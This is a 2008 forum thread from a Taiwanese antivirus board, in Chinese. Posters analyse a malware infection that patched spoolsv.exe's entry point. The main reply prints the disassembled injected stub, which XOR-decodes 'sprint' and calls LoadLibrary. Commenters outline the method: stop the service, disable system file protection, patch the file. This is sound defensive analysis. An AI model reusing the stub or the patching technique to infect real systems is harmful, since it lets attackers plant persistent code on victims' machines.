作者zha0 (zha0)
站内AntiVirus
标题Re: [方案] 这两天的倒数60秒
时间Sat Sep 27 15:16:54 2008
bingo :)
我刚去看了一下 ... 有换掉,
改 spoolsv.exe 的 Entrypoint 进入点.
你如果二个档案去做 diff 可以发现有多加 code :)
跟之前 FlashGet 那事件一样 :)
spoolsv.exe 被多加 Code 然後用 LoadLibrary 把 sprint.dll 起来.
public start
start proc near
var_28= dword ptr -28h
var_24= dword ptr -24h
call $+5
pop eax
pusha
mov ecx, 53285049h
push 53282427h
xor [esp+24h+var_24], ecx
push 3A5A203Ah
xor [esp+28h+var_28], ecx ; sprint
push esp
add eax, 0FFFF4647h
mov ebx, [eax] ; LoadLibrary
call ebx
pop eax
pop ebx
popa
jmp _mainCRTStartup
start endp
※ 引述《cmonkey (虾猴)》之铭言:
: spoolsv.exe的确是被改了。
: http://www.badongo.com/file/11511957
: 把两个档案上传,让高手看看。
: 另v2messem.exe被 pccilline隔离了,找不到说。
: 被清除掉的中毒档如下:
: http://www.badongo.com/file/11512031
: 这个好像是升上sp3才会中的毒?
--
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 124.8.79.216
1F:→ zha0:PS. FlashGet那个还有做SEH保謢XD 这个没..Load不起来就Q!#%^ 09/27 15:22
2F:推 junorn:所以是作者没写好就放上来丢脸这样0.0? 09/27 15:25
3F:→ zha0:有写好啊, 只是没加 Error handler 如果 sprint LoadLibrary 09/27 15:26
4F:→ zha0:不起来会出错 ..... 没去考虑到 (会跳 XXXX.DLL 不能载入) 09/27 15:27
5F:→ junorn:原来是这样...了解m(_o_)m 09/27 15:28
6F:→ zha0:是指 rpc 那个(如果是 local exploit) ... 而不是这个 XD 09/27 15:28
7F:推 unbowed:可以请问为什麽spoolv.exe会被改掉吗?OTZ是病毒吗? 09/27 15:30
8F:→ zha0:会被改掉很简单 ^^ 因为现在有型为分析的防毒软体,都会监控 09/27 15:32
9F:→ zha0:registry 的一些开机自动执行的机码 , 所以换开机中会执行 09/27 15:32
10F:→ zha0:的档案是最快的方式 , 他先把 service 停掉,然後在把 SFP 09/27 15:33
11F:→ zha0:关掉 , 然後就去修改那个档案,然後在开起来 XD 09/27 15:33
12F:→ zha0:如上 , 就把 sprint.dll 载入到 spoolsv 的空间去了 . 09/27 15:34
13F:推 idaer:z大 这算是DLL Injection吗? 在记忆体里挂上dll?? 09/27 15:44
14F:→ zha0:idaer: 其实行为比较像是 virus 感染的手法 XD 但 DLL 有被 09/27 15:46
15F:→ zha0:挂起来又是真的 XD 好吧算他是 patch 档案的 DLL Injection 09/27 15:46
16F:→ zha0:其实大多要让 DLL 挂到 Process 的方法还满多的 ... 09/27 15:47
17F:推 idaer:问个外行的问题 直接用svchost挂sprint.dll 行不行阿 09/27 15:48
18F:→ idaer:XD 我找到样本了 等我3分钟 我上传一下 QQ 09/27 15:49
19F:→ zha0:idaer: 可以啊, 把那个 dll 写成 service 的程式就可以了, 09/27 15:52
20F:推 junorn:你们加油假日没环境测0rz 09/27 15:52
21F:→ zha0:但是 .... 你要去建出那 service 时有 HIPS 功能的防毒会叫 09/27 15:52
22F:→ zha0:像是灰鸽子,黑色信鸽 ... 很多 XD 就是挂成 Service 的方式 09/27 15:53
24F:→ idaer:我刚刚在虚拟机下跑了 这病毒用sandboxie跑会直接出现错误 09/27 15:57
25F:→ idaer:给你看 连跑都不给跑 产生的tmp 在关掉SBIE後顺便一起杀掉@@ 09/27 15:58
26F:推 junorn:权限没办法提升所以就跳错误我猜。 09/27 15:58
27F:→ zha0:idaer: 直接用 VMware 跑吧,VMware 用 6 的因为 5 的遇到特 09/27 16:00
28F:→ zha0:殊指令会出错 . 09/27 16:00
29F:→ zha0:好像没看到 exploit code 鸣 ... 还是找不到它进来的原因 . 09/27 16:00
30F:→ idaer:恩恩 逼的我只好用Hips的软体执行它了 SSM的Hips不知道好不 09/27 16:01
31F:→ zha0:在测二个方式 1. 那些人之前已经中了, 然後坏人植入别的程式 09/27 16:01
32F:→ zha0:就是这个 v2messen.exe 然後造成 rpc 错误 . 09/27 16:02
33F:→ idaer:好用 我都用Virtual PC耶 VMware好像只用过一次@@ 09/27 16:02
34F:→ zha0:2. 真的是用 remote exploit 打进来的 , 但 shellcode 本身就 09/27 16:02
35F:→ zha0:只是一个 downloader , 去下载这个程式下来 >____< 09/27 16:02
36F:→ zha0:如果是 remote 比较想知他用什麽弱点进来的啊 >____< 09/27 16:03
37F:→ idaer:z大 太专业了 我...我已经插不上话了 j大快点出个声阿(指) 09/27 16:04
38F:→ zha0:先出门,有空在看 v2messen 里面有没什麽 exploit code > < 09/27 16:05
39F:推 junorn:这我也门外汉啊XD 09/27 16:05
40F:→ zha0:他本身 VC 在写时,在里面插好多 junk code XDXD 09/27 16:05
41F:→ zha0:不是是用加壳做变型,还是自己吃宝没事插 junk code 09/27 16:06
42F:→ junorn:Z大是要找是不是这档案靠0day来进去系统并启动 09/27 16:06
43F:推 idaer:板上人数现在有140耶 难道大家都被(伪)疾风吸引过来了吗XD 09/27 16:13
44F:推 junorn:对啊0rz ,系统出问题的时候才会有人来 09/27 16:19
45F:推 fddk:就像MSN版也是可以红爆的XD 09/27 16:48
46F:推 YTsungL:基本上 malware 都没在作 error handling... 09/28 11:49
47F:→ YTsungL:这个行为是 infect, 不算 dll injecton 09/28 11:50